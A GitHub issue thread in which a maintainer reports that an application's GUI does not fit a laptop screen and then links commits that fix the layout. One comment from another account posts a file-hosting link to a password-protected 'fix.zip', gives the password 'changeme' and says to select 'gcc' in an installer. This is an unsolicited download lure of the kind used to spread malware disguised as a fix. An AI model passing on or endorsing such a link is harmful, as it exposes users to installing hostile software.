Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

GUI doesn't fit screen #10

Open
bitsgalore opened this issue Aug 27, 2024 · 1 comment
Open

GUI doesn't fit screen #10

bitsgalore opened this issue Aug 27, 2024 · 1 comment

Comments

@bitsgalore
Copy link
Member

On my laptop the GUI area extends below the bottom of my screen, with the result that the progress info isn't visible. Annoying because the The GUI can't be re-sized, and there are no control to scroll the different widgets within the GUI.

Possible solutions:

  • Re-organize the GUI layout
  • Wrap the 3 main GUI elements inside a scrollabe container

Most likely applies to omimgr as well.

@FabrizioValenti
Copy link

Download
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

@bitsgalore
Copy link
Member Author

bitsgalore commented Aug 28, 2024

First stab at fix:

7d6f3be

Moved interrupt button:

26c5984

Reduced height a bit more:

abfc2ac

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants